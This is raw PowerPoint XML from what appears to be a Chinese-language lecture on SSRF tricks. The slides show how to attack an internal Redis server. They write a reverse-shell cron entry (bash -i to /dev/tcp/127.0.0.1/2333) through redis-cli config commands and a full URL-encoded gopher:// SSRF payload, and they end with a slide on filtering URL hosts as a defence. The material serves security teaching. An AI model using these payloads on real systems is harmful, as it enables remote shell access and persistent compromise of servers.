              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击内网服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为例）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A54A85-E144-424E-A3F1-F35215554F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158240" y="3071336"/>
            <a:ext cx="8549640" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/ 127.0.0.1/2333 0&gt;&amp;1\n\n</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dir /var/spool/cron</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dbfilename root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>save</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE745E9-86E0-9448-A576-965BA217072A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173480" y="1837361"/>
            <a:ext cx="8382000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dbfilename</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，将反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的命令写入定时任务</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">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372211851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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击内网服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为例）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0606F9-7153-0F45-A756-A458FED59AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2470278"/>
            <a:ext cx="8945880" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -e </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\n\n*/1 * * * * bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1\n\n</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redis-cli -h </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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p </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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>redis-cli -h </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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p </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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dir /var/spool/cron/ redis-cli -h </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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p </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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> config </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dbfilename root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>redis-cli -h </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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p </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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> save redis-cli -h </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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p </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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> quit</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4F7714-AF55-A54A-92E5-62A542569F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1837361"/>
            <a:ext cx="8382000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>redis-cli</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行命令，并用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>接收通信流量</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">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245389320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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击内网服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为例）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0606F9-7153-0F45-A756-A458FED59AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021080" y="2554382"/>
            <a:ext cx="8945880" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0d%0a%0a%0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a*/1 * * * * bash -i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&amp; /dev/tcp/127.0.0.1/2333 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&amp;1%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0ad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>uit%0d%0a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{470DA68A-1ED1-6B42-9A6D-9912BBB1D0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021080" y="1837361"/>
            <a:ext cx="8214360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将对</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的请求流量改为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>gopher</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>协议的格式，发送即可</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">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272795358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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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1784"/>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SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7904DD8-C859-964B-AFCB-AB416AD0F1DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112520" y="1704446"/>
            <a:ext cx="10408920" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>过滤传入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>（有没有问题？）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
